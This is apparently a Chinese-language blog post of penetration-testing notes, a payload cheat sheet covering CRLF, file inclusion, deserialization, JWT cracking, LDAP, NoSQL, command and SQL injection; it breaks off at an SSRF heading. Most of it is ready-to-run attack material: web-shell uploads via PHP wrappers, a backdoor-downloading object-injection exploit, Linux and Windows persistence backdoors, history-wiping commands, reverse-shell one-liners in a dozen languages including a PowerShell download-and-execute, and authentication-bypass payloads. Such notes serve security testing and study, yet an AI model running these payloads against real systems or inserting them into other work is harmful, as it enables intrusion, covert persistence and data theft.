滲透測試筆記

資料庫滲透測試 · 發表 2018-12-11 20:04:04

摘要：最近看到一個很不錯的倉庫，趁有時間，全部看了下做個筆記。 1、CRLF CRLF - 新增cookie http://www.example.com/%0D%0ASet-Cookie:mycookie=myvalue CRLF - 繞過XSS http://e...

最近看到一個很不錯的倉庫，趁有時間，全部看了下做個筆記。

1、CRLF

CRLF - 新增cookie

http://www.example.com/%0D%0ASet-Cookie:mycookie=myvalue

CRLF - 繞過XSS

http://example.com/%0d%0aContent-Length:35%0d%0aX-XSS-Protection:0%0d%0a%0d%0a23%0d%0a<svg%20onload=alert(document.domain)>%0d%0a0%0d%0a/%2f%2e%2e

CRLF - 釣魚

http://www.example.com/index.php?lang=en%0D%0AContent-Length%3A%200%0A%20%0AHTTP/1.1%20200%20OK%0AContent-Type%3A%20text/html%0ALast-Modified%3A%20Mon%2C%2027%20Oct%202060%2014%3A50%3A18%20GMT%0AContent-Length%3A%2034%0A%20%0A%3Chtml%3EYou%20have%20been%20Phished%3C/html%3E

CRLF - Filter Bypass

使用UTF-8編碼：
%E5%98%8A => %0A => \u560a
%E5%98%8D => %0D => \u560d
%E5%98%BE => %3E => \u563e (>)
%E5%98%BC => %3C => \u563c (<)

%E5%98%8A%E5%98%8Dcontent-type:text/html%E5%98%8A%E5%98%8Dlocation:%E5%98%8A%E5%98%8D%E5%98%8A%E5%98%8D%E5%98%BCsvg/onload=alert%28innerHTML%28%29%E5%98%BE

2、CSV Excel表示式注入

任何以'='，'+'，'-'，'@'字元開頭的單元格都將被表格軟體解釋為公式
動態資料交換（Dynamic Data Exchange）：
=DDE(server; file; item; mode)
Exploit：
=DDE ("cmd";"/C calc";"!A0")A0
@SUM(1+1)*cmd|' /C calc'!A0

3、檔案包含

Linux

/etc/issue
/etc/passwd
/etc/shadow
/etc/group
/etc/hosts
/etc/motd
/etc/mysql/my.cnf
/proc/PID/fd/檔案描述符
/proc/self/environ
/proc/version
/proc/cmdline
/proc/sched_debug
/proc/mounts
/proc/net/arp
/proc/net/route
/proc/net/tcp
/proc/net/udp

Windows

c:/boot.ini
c:/inetpub/logs/logfiles
c:/inetpub/wwwroot/global.asa
c:/inetpub/wwwroot/index.asp
c:/inetpub/wwwroot/web.config
c:/sysprep.inf
c:/sysprep.xml
c:/sysprep/sysprep.inf
c:/sysprep/sysprep.xml
c:/system32/inetsrv/metabase.xml
c:/sysprep.inf
c:/sysprep.xml
c:/sysprep/sysprep.inf
c:/sysprep/sysprep.xml
c:/system volume information/wpsettings.dat
c:/system32/inetsrv/metabase.xml
c:/unattend.txt
c:/unattend.xml
c:/unattended.txt
c:/unattended.xml

log

/var/log/apache/access.log
/var/log/apache/error.log
/var/log/httpd/error_log
/usr/local/apache/log/error_log
/usr/local/apache2/log/error_log
/var/log/vsftpd.log
/var/log/sshd.log
/var/log/mail

基本語法

http://example.com/index.php?page=../../../etc/passwd

00截斷

http://example.com/index.php?page=../../../etc/passwd%00

雙編碼

http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd
http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd%00

目錄穿越

http://example.com/index.php?page=../../../../../../../../../etc/passwd..\.\.\.\.\.\.\.\.\.\.\[...]\.\.
http://example.com/index.php?page=../../../../[…]../../../../../etc/passwd

Bypass Filter:

http://example.com/index.php?page=....//....//etc/passwd
http://example.com/index.php?page=..///////..////..//////etc/passwd
http://example.com/index.php?page=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd

協議封裝

php://filter

http://example.com/index.php?page=php://filter/read=string.rot13/resource=index.php
http://example.com/index.php?page=php://filter/convert.base64-encode/resource=index.php
http://example.com/index.php?page=pHp://FilTer/convert.base64-encode/resource=index.php
http://example.com/index.php?page=php://filter/convert.base64-encode|convert.base64-encode|convert.base64-encode/resource=index.php
連結大檔案：
http://example.com/index.php?page=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd

zip://

echo "<pre><?php system($_GET['cmd']); ?></pre>" > payload.php;
zip payload.zip payload.php;
mv payload.zip shell.jpg;

http://example.com/index.php?page=zip://shell.jpg%23payload.php

data://

http://example.com/index.php?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7Pz4=
base64內容: "<?php system($_GET['cmd']);?>"

繞過xss防護
http://example.com/index.php?page=data:application/x-httpd-php;base64,PHN2ZyBvbmxvYWQ9YWxlcnQoMSk+
base64內容: <svg onload=alert(1)>

expect://

http://example.com/index.php?page=expect://id
http://example.com/index.php?page=expect://ls

input://

http://example.com/index.php?page=php://input
POST:
<?php system('id'); ?>

phar://

// 建立一個Phar檔案
$phar = new Phar('test.phar');
$phar->startBuffering();
$phar->addFromString('test.txt', 'text');
$phar->setStub('<?php __HALT_COMPILER(); ? >');

// 新增元資料
class AnyClass {}
$object = new AnyClass;
$object->data = 'phar';
$phar->setMetadata($object);
$phar->stopBuffering();

// 漏洞觸發
class AnyClass {
function __destruct() {
echo $this->data;
}
}
// 輸出: phar
include('phar://test.phar');

遠端命令執行

/proc/*/fd

1、上傳一些shell檔案（100+）
2、包含: http://example.com/index.php?page=/proc/$PID/fd/$FD
$PID 程序號（可爆破）
$FD 檔案描述符（可爆破）

/proc/self/environ

和日誌檔案一樣，在ua中傳送的payload，會記錄在/proc/self/environ檔案中

GET index.php?page=../../../proc/self/environ HTTP/1.1
User-Agent: <?=phpinfo(); ?>

檔案上傳

上傳一個包含惡意程式碼的任意格式的檔案，比如: <?php system($_GET['c']);?>

http://example.com/index.php?page=path/to/upload/file.png

條件競爭

1、上傳一個檔案並觸發自包含
2、大量重複上傳來增加贏得競爭的機率和爆破的機率
3、對包含檔案進行爆破: /tmp/[0-9a-zA-Z]{6}

// bruteforce_upload_race.py
import itertools
import requests
import sys

print('[+] Upload Trying...')
f = {'file': open('shell.php', 'rb')}
for _ in range(4096 * 4096):
requests.post('http://target.com/index.php?c=index.php', f)

print('[+] Bruteforcing...')
for fname in itertools.combinations(string.ascii_letters + string.digits, 6):
url = 'http://target.com/index.php?c=/tmp/php' + fname
r = requests.get(url)
if 'load average' in r.text:# <?php echo system('uptime');
print('[+] We have got a shell: ' + url)
sys.exit(0)

print('[x] Something went wrong, please try again')

phpinfo

ofollow,noindex">https://www.insomniasec.com/downloads/publications/phpinfolfi.py

4、不安全的反序列化

Java

Exploit：https://github.com/frohoff/ysoserial

java -jar ysoserial.jar CommonsCollections1 calc.exe > commonpayload.bin
java -jar ysoserial.jar Groovy1 calc.exe > groovypayload.bin
java -jar ysoserial-master-v0.0.4-g35bce8f-67.jar Groovy1 'ping 127.0.0.1' > payload.bin
java -jar ysoserial.jar Jdk7u21 bash -c 'nslookup `uname`.[redacted]' | gzip | base64

Burp Suite擴充套件：
JavaSerialKiller
Java Deserialization Scanner
Burp-ysoserial
SuperSerial
SuperSerial-Active

PHP

<?php 
system('gnome-terminal -x sh -c \'nc -lvvp 2333\'');

class PHPObjectInjection
{
public $inject = "system('wget http://127.0.0.1/backdoor.txt -O phpobjbackdoor.php && php phpobjbackdoor.php');";
}

$url = 'http://localhost/xvwa/vulnerabilities/php_object_injection/?r=';
$url = $url . urlencode(serialize(new PHPObjectInjection));
print "[+] Sending exploit...\r\n";
$response = file_get_contents("$url");
?>

Python

import cPickle
from base64 import b64encode, b64decode

class Evil(object):
def __reduce__(self):
return (os.system,("whoami",))

e = Evil()
evil_token = b64encode(cPickle.dumps(e))
print("Your Evil Token : {}").format(evil_token)

Ruby

for i in {
0..5
};
do docker run - it ruby: 2. $ {
i
}
ruby - e 'Marshal.load(["0408553a1547656d3a3a526571756972656d656e745b066f3a1847656d3a3a446570656e64656e63794c697374073a0b4073706563735b076f3a1e47656d3a3a536f757263653a3a537065636966696346696c65063a0a40737065636f3a1b47656d3a3a5374756253706563696669636174696f6e083a11406c6f616465645f66726f6d49220d7c696420313e2632063a0645543a0a4064617461303b09306f3b08003a1140646576656c6f706d656e7446"].pack("H*")) rescue nil';
done

5、JWT（JSON Web Token）

格式: Base64(Header).Base64(Data).Base64(Signature)
Example: 
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkFtYXppbmcgSGF4eDByIiwiZXhwIjoiMTQ2NjI3MDcyMiIsImFkbWluIjp0cnVlfQ.UL9Pz5HbaMdZCV9cS9OcpccjrlkcmLovL2A2aiKiAOY

JWT線上加解密：https://www.jsonwebtoken.io/

JWT利用工具:
jwt_tool
git clone https://github.com/ticarpi/jwt_tool
> python jwt_tool.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJsb2dpbiI6InRpY2FycGkifQ.aqNCvShlNT9jBFTPBpHDbt2gBB1MyHiisSDdp8SQvgw result.txt

c-jwt-cracker
git clone https://github.com/brendan-rius/c-jwt-cracker
>./jwtcrack eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWV9.cAOIAifu3fykvhkHpbuhbvtH807-Z2rI1FS3vX1XMjE
> Secret is "Sn1f"

Hashcat
hashcat -m 16500 hash.txt -a 3 -w 3 ?a?a?a?a?a?a
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMj...Fh7HgQ:secret

6、LDAP注入

Example 1:
user= *)(uid=*))(|(uid=*
pass= password
query = "(&(uid=*)(uid=*)) (|(uid=*)(userPassword=MD5(password}))"

Example 2:
user= admin)(!(&(1=0
pass= q))
query = (&(uid=admin)(!(&(1=0)(userPassword=q))))

攻擊Payload:
*
*)(&
*))%00
)(cn=))\x00
*()|%26'
*()|&'
*(|(mail=*))
*(|(objectclass=*))
*)(uid=*))(|(uid=*
*/*
*|
/
//
//*
@*
|
admin*
admin*)((|userpassword=*)
admin*)((|userPassword=*)
x' or name()='username' or 'x'='y

預設屬性:
// *)(ATTRIBUTE_HERE=*
userPassword
surname
name
cn
sn
objectClass
mail
givenName
commonName

7、Linux-持久控制

基本反彈shell

ncat --udp -lvp 2333
ncat --tcp -lvp 2333
ncat --sctp -lvp 2333

SUID

TMPDIR="/var/tmp"
echo 'int main(void){setresuid(0, 0, 0);system("/bin/sh");}' > $TMPDIR/suidshell.c
gcc $TMPDIR/suidshell.c -o $TMPDIR/suidshell 2>/dev/null
chown root:root $TMPDIR/suidshell
chmod 4777 $TMPDIR/suidshell

Crontab

(crontab -l ; echo "@reboot sleep 200 && ncat 192.168.1.2 4242 -e /bin/bash")|crontab 2> /dev/null

啟動服務

RSHELL="ncat $LMTHD $LHOST $LPORT -e \"/bin/bash -c id;/bin/bash\" 2>/dev/null"
sed -i -e "4i \$RSHELL" /etc/network/if-up.d/upstart

啟動檔案

Linux, write a file in ~/.config/autostart/NOM_OF_FILE.desktop

In : ~/.config/autostart/*.desktop

[Desktop Entry]
Type=Application
Name=Welcome
Exec=/var/lib/gnome-welcome-tour
AutostartCondition=unless-exists ~/.cache/gnome-getting-started-docs/seen-getting-started-guide
OnlyShowIn=GNOME;
X-GNOME-Autostart-enabled=false

驅動程式

echo "ACTION==\"add\",ENV{DEVTYPE}==\"usb_device\",SUBSYSTEM==\"usb\",RUN+=\"$RSHELL\"" | tee /etc/udev/rules.d/71-vbox-kernel-drivers.rules > /dev/null

Tips

1、使用ANSI字元隱藏payload
2、清除歷史命令
export HISTSIZE=0
export HISTFILESIZE=0
unset HISTFILE; CTRL-D
or
kill -9 $$
or
echo "" > ~/.bash_history
or
rm ~/.bash_history -rf
or
history -c
or
ln /dev/null ~/.bash_history -sf
3、以下臨時目錄通常是可寫的
/var/tmp/
/tmp/
/dev/shm/

8、Windows-持久控制

登錄檔

在HKCU\Software\Microsoft\Windows的Run中建立REG_SZ

名稱:Backdoor
值:C:\Users\test\AppData\Local\Temp\backdoor.exe

與HKCU一樣，在HKLM\Software\Microsoft\Windows的Run鍵中建立REG_SZ

名稱:Backdoor
值:C:\Windows\Temp\backdoor.exe

啟動項

在使用者啟動資料夾中建立批處理指令碼
PS C:\> gc C:\Users\test\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\backdoor.bat
start /b C:\Users\test\AppData\Local\Temp\backdoor.exe

計劃任務

PS C:\> $A = New-ScheduledTaskAction -Execute "cmd.exe" -Argument "/c C:\Windows\Temp\backdoor.exe"
PS C:\> $T = New-ScheduledTaskTrigger -Daily -At 9am
PS C:\> $P = New-ScheduledTaskPrincipal "NT AUTHORITY\SYSTEM" -RunLevel Highest
PS C:\> $S = New-ScheduledTaskSettingsSet
PS C:\> $D = New-ScheduledTask -Action $A -Trigger $T -Principal $P -Settings $S
PS C:\> Register-ScheduledTask Backdoor -InputObject $D

服務

PS C:\> New-Service -Name "Backdoor" -BinaryPathName "C:\Windows\Temp\backdoor.exe" -Description "Nothing to see here."

9、網路轉發

Windows netsh

netsh interface portproxy add v4tov4 listenaddress=localaddress listenport=localport connectaddress=destaddress connectport=destport

netsh interface portproxy add v4tov4 listenport=3340 listenaddress=10.1.1.110 connectport=3389 connectaddress=10.1.1.110

1、listenaddress – 等待連線的本地IP地址
2、listenport – 本地等待連線的監聽埠
3、connectaddress – 將連線重定向到的遠端IP地址
4、connectport – 將listenport連線轉發到此埠

SSH

SOCKS代理

ssh -N -f -D 9000 [user]@[host]
-f : ssh in background
-N : do not execute a remote command

本地埠轉發

ssh -L [bindaddr]:[port]:[dsthost]:[dstport] [user]@[host]

遠端埠轉發

ssh -R [bindaddr]:[port]:[localhost]:[localport] [user]@[host]

Proxychains

1、Config file: /etc/proxychains.conf

[ProxyList]
socks4 localhost 8080

2、proxychains nmap -sT 192.168.5.6

Web SOCKS - reGeorg

https://github.com/sensepost/reGeorg

python reGeorgSocksProxy.py -p 8080 -u http://compromised.host/shell.jsp

Metasploit

portfwd list
portfwd add -L 0.0.0.0 -l 445 -r 192.168.57.102 -p 445
or
run autoroute -s 192.168.57.0/24
use auxiliary/server/socks4a

10、反彈shell

Bash TCP

bash -i >& /dev/tcp/<IP>/<PORT> 0>&1

0<&196;exec 196<>/dev/tcp/<IP>/<PORT>; sh <&196 >&196 2>&196

Bash UDP

肉雞:
sh -i >& /dev/udp/127.0.0.1/4242 0>&1
攻擊機:
nc -u -lvp 4242

Perl

perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"[IPADDR]:[PORT]");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'


NOTE: Windows only
perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"[IPADDR]:[PORT]");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

Python

Linux

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("127.0.0.1",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Windows

python -c "(lambda __y, __g, __contextlib: [[[[[[[(s.connect(('10.11.0.37', 4444)), [[[(s2p_thread.start(), [[(p2s_thread.start(), (lambda __out: (lambda __ctx: [__ctx.__enter__(), __ctx.__exit__(None, None, None), __out[0](lambda: None)][2])(__contextlib.nested(type('except', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: __exctype is not None and (issubclass(__exctype, KeyboardInterrupt) and [True for __out[0] in [((s.close(), lambda after: after())[1])]][0])})(), type('try', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: [False for __out[0] in [((p.wait(), (lambda __after: __after()))[1])]][0]})())))([None]))[1] for p2s_thread.daemon in [(True)]][0] for __g['p2s_thread'] in [(threading.Thread(target=p2s, args=[s, p]))]][0])[1] for s2p_thread.daemon in [(True)]][0] for __g['s2p_thread'] in [(threading.Thread(target=s2p, args=[s, p]))]][0] for __g['p'] in [(subprocess.Popen(['\\windows\\system32\\cmd.exe'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE))]][0])[1] for __g['s'] in [(socket.socket(socket.AF_INET, socket.SOCK_STREAM))]][0] for __g['p2s'], p2s.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: (__l['s'].send(__l['p'].stdout.read(1)), __this())[1] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 'p2s')]][0] for __g['s2p'], s2p.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: [(lambda __after: (__l['p'].stdin.write(__l['data']), __after())[1] if (len(__l['data']) > 0) else __after())(lambda: __this()) for __l['data'] in [(__l['s'].recv(1024))]][0] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 's2p')]][0] for __g['os'] in [(__import__('os', __g, __g))]][0] for __g['socket'] in [(__import__('socket', __g, __g))]][0] for __g['subprocess'] in [(__import__('subprocess', __g, __g))]][0] for __g['threading'] in [(__import__('threading', __g, __g))]][0])((lambda f: (lambda x: x(x))(lambda y: f(lambda: y(y)()))), globals(), __import__('contextlib'))"

PHP

php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

Ruby

ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

ruby -rsocket -e 'exit if fork;c=TCPSocket.new("[IPADDR]","[PORT]");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

NOTE: Windows only
ruby -rsocket -e 'c=TCPSocket.new("[IPADDR]","[PORT]");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

nc

ncat 127.0.0.1 4444 -e /bin/bash
ncat --udp 127.0.0.1 4444 -e /bin/bash

Powershell

1、powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("[IPADDR]",[PORT]);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2= $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
2、powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.1.3.40',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
3、powershell IEX (New-Object Net.WebClient).DownloadString('https://gist.githubusercontent.com/staaldraad/204928a6004e89553a8d3db0ce527fd5/raw/fe5f74ecfae7ec0f2d50895ecf9ab9dafe253ad4/mini-reverse.ps1')

Awk

awk 'BEGIN {s = "/inet/tcp/0/<IP>/<PORT>"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null

Java

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

NodeJS

require('child_process').exec('nc -e /bin/sh [IPADDR] [PORT]')
or
-var x = global.process.mainModule.require
-x('child_process').exec('nc [IPADDR] [PORT] -e /bin/bash')
or
https://gitlab.com/0x4ndr3/blog/blob/master/JSgen/JSgen.py

11、NoSQL注入

Exploit

使用$ne、$gt繞過認證
in URL
username[$ne]=toto&password[$ne]=toto

in JSON
{"username": {"$ne": null}, "password": {"$ne": null} }
{"username": {"$ne": "foo"}, "password": {"$ne": "bar"} }
{"username": {"$gt": undefined}, "password": {"$gt": undefined} }
獲取長度
username[$ne]=toto&password[$regex]=.{1}
username[$ne]=toto&password[$regex]=.{3}
獲取資料
in URL
username[$ne]=toto&password[$regex]=m.{2}
username[$ne]=toto&password[$regex]=md.{1}
username[$ne]=toto&password[$regex]=mdp
or
username[$ne]=toto&password[$regex]=m.*
username[$ne]=toto&password[$regex]=md.*

in JSON
{"username": {"$eq": "admin"}, "password": {"$regex": "^m" }}
{"username": {"$eq": "admin"}, "password": {"$regex": "^md" }}
{"username": {"$eq": "admin"}, "password": {"$regex": "^mdp" }}

NoSQL盲注

import requests
import urllib3
import string
import urllib
urllib3.disable_warnings()

username="admin"
password=""

while True:
for c in string.printable:
if c not in ['*','+','.','?','|']:
payload='{"username": {"$eq": "%s"}, "password": {"$regex": "^%s" }}' % (username, password + c)
r = requests.post(u, data = {'ids': payload}, verify = False)
if 'OK' in r.text:
print("Found one more char : %s" % (password+c))
password += c

MongoDB Payloads

true, $where: '1 == 1'
, $where: '1 == 1'
$where: '1 == 1'
', $where: '1 == 1'
1, $where: '1 == 1'
{ $ne: 1 }
', $or: [ {}, { 'a':'a
' } ], $comment:'successful MongoDB injection'
db.injection.insert({success:1});
db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1
|| 1==1
' && this.password.match(/.*/)//+%00
' && this.passwordzz.match(/.*/)//+%00
'%20%26%26%20this.password.match(/.*/)//+%00
'%20%26%26%20this.passwordzz.match(/.*/)//+%00
{$gt: ''}
[$ne]=1

12、開放重定向

Exploit

1、使用白名單繞過
www.whitelisted.com.evil.com
2、使用'CRLF'繞過'javascript'黑名單關鍵字
java%0d%0ascript%0d%0a:alert(0)
3、使用'//'繞過'http'黑名單關鍵字
//baidu.com
4、使用'https'繞過'//'黑名單關鍵字
https:baidu.com
5、使用'\/\/'繞過'//'黑名單關鍵字
\/\/baidu.com/
/\/baidu.com/
6、使用'%E3%80%82'繞過'.'黑名單關鍵字
//baidu%E3%80%82com
7、使用'%00'繞過黑名單
//baidu%00.com
8、使用引數汙染繞過
?next=whitelisted.com&next=baidu.com
9、使用'@'繞過
http://[email protected]/
10、使用目錄繞過
http://www.baidu.com/http://www.whitelisted.com/
http://www.baidu.com/folder/www.whitelisted.com
11、XSS by Open URL（如果在js變數中）
";alert(0);//
12、XSS by data協議
http://www.example.com/redirect.php?url=data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik7PC9zY3JpcHQ+Cg==
13、XSS by javascript協議
http://www.example.com/redirect.php?url=javascript:prompt(1)

通用引數

/{payload}
?next={payload}
?url={payload}
?target={payload}
?rurl={payload}
?dest={payload}
?destination={payload}
?redir={payload}
?redirect_uri={payload}
?redirect_url={payload}
?redirect={payload}
/redirect/{payload}
/cgi-bin/redirect.cgi?{payload}
/out/{payload}
/out?{payload}
?view={payload}
/login?to={payload}
?image_url={payload}
?go={payload}
?return={payload}
?returnTo={payload}
?return_to={payload}
?checkout_url={payload}
?continue={payload}
?return_path={payload}

13、遠端命令執行

連線符

ps;ls
ps&ls
ps&&ls
ps|ls
fail_command||ls

內嵌命令

other_command `cat /etc/passwd`
other_command $(cat /etc/passwd)

繞過空格-Linux

cat</etc/passwd
{cat,/etc/passwd}
cat$IFS/etc/passwd
echo${IFS}"RCE"${IFS}&&cat${IFS}/etc/passwd
X=$'uname\x20-a'&&$X
sh</dev/tcp/127.0.0.1/80
IFS=,;`cat<<<uname,-a`

繞過空格-Windows

ping%CommonProgramFiles:~10,-18%IP
ping%PROGRAMFILES:~10,-5%IP

萬用字元

常用萬用字元
*
?
[]
[-]
[^]
[!]
{str1,str2,…}
專用字符集
...
/???/??t /???/p??s??

繞過zsh/bash/sh

echo $0
-> /usr/bin/zsh
echo whoami|$0

其他繞過

單引號
w'h'o'am'i
雙引號
w"h"o"am"i
反斜槓和斜槓
w\ho\am\i
/\b\i\n/////s\h
使用$@
who$@ami
擴充套件變數
test=/ehhh/hmtc/pahhh/hmsswd
cat ${test//hhh\/hm/}
cat ${test//hh??hm/}

14、SQL注入

MSSQL 注入
MySQL%20Injection.md" target="_blank" rel="nofollow,noindex">MySQL 注入
OracleSQL 注入
PostgreSQL%20Injection.md" target="_blank" rel="nofollow,noindex">PostgreSQL 注入
SQLite 注入

檢測點

'
%27
"
%22
#
%23
;
%3B
)
Wildcard (*)
%%2727
%25%27
`+HERP
'||'DERP
'+'herp
' 'DERP
'%20'HERP
'%2B'HERP

DBMS識別

["conv('a',16,2)=conv('a',16,2)","MYSQL"]
["connection_id()=connection_id()","MYSQL"]
["crc32('MySQL')=crc32('MySQL')","MYSQL"]
["BINARY_CHECKSUM(123)=BINARY_CHECKSUM(123)","MSSQL"]
["@@CONNECTIONS>0","MSSQL"]
["@@CONNECTIONS=@@CONNECTIONS","MSSQL"]
["@@CPU_BUSY=@@CPU_BUSY","MSSQL"]
["USER_ID(1)=USER_ID(1)","MSSQL"]
["ROWNUM=ROWNUM","ORACLE"]
["RAWTOHEX('AB')=RAWTOHEX('AB')","ORACLE"]
["LNNVL(0=123)","ORACLE"]
["5::int=5","POSTGRESQL"]
["5::integer=5","POSTGRESQL"]
["pg_client_encoding()=pg_client_encoding()","POSTGRESQL"]
["get_current_ts_config()=get_current_ts_config()" ,"POSTGRESQL"]
["quote_literal(42.5)=quote_literal(42.5)","POSTGRESQL"]
["current_database()=current_database()","POSTGRESQL"]
["sqlite_version()=sqlite_version()","SQLITE"]
["last_insert_rowid()>1","SQLITE"]
["last_insert_rowid()=last_insert_rowid()","SQLITE"]
["val(cvar(1))=1","MSACCESS"]
["IIF(ATN(2)>0,1,0) BETWEEN 2 AND 0","MSACCESS"]
["cdbl(1)=cdbl(1)","MSACCESS"]
["1337=1337","MSACCESS,SQLITE,POSTGRESQL,ORACLE,MSSQL,MYSQL"]
["'i'='i'","MSACCESS,SQLITE,POSTGRESQL,ORACLE,MSSQL,MYSQL"]

SQLmap自動化攻擊

sqlmap -u "http://example.com/" --crawl=1 --random-agent --batch --forms --threads=5 --level=5 --risk=3

認證繞過

'-'
' '
'&'
'^'
'*'
' or 1=1 limit 1 -- -+
'="or'
' or ''-'
' or '' '
' or ''&'
' or ''^'
' or ''*'
'-||0'
"-||0"
"-"
" "
"&"
"^"
"*"
" or ""-"
" or "" "
" or ""&"
" or ""^"
" or ""*"
or true--
" or true--
' or true--
") or true--
') or true--
' or 'x'='x
') or ('x')=('x
')) or (('x'))=(('x
" or "x"="x
") or ("x")=("x
")) or (("x"))=(("x
or 2 like 2
or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '2' LIKE '1
admin' or 2 LIKE 2--
admin' or 2 LIKE 2#
admin') or 2 LIKE 2#
admin') or 2 LIKE 2--
admin') or ('2' LIKE '2
admin') or ('2' LIKE '2'#
admin') or ('2' LIKE '2'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
admin" --
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055

認證繞過（Raw MD5）

Example：
"SELECT * FROM admin WHERE pass = '".md5($password,true)."'"
我們只有找到md5($password,true)中包含' or '[...]的字元即可
md5("ffifdyop", true) = 'or'6�]��!r,��b�

waf繞過

繞過空格
?id=1%09and%091=1%09--
?id=1%0Dand%0D1=1%0D--
?id=1%0Cand%0C1=1%0C--
?id=1%0Band%0B1=1%0B--
?id=1%0Aand%0A1=1%0A--
?id=1%A0and%A01=1%A0--
註釋
?id=1/*comment*/and/**/1=1/**/--
括號
?id=(1)and(1)=(1)--
繞過逗號
LIMIT 0,1-> LIMIT 1 OFFSET 0
SUBSTR('SQL',1,1) -> SUBSTR('SQL' FROM 1 FOR 1).
SELECT 1,2,3,4-> UNION SELECT * FROM (SELECT 1)a JOIN (SELECT 2)b JOIN (SELECT 3)c JOIN (SELECT 4)d
等效符
AND-> &&
OR-> ||
=-> LIKE,REGEXP, not < and not >
> X-> not between 0 and X
WHERE -> HAVING
繞過information_schema.tables
select * from mysql.innodb_table_stats;
// select @@innodb_version;

15、SSRF

Exploit

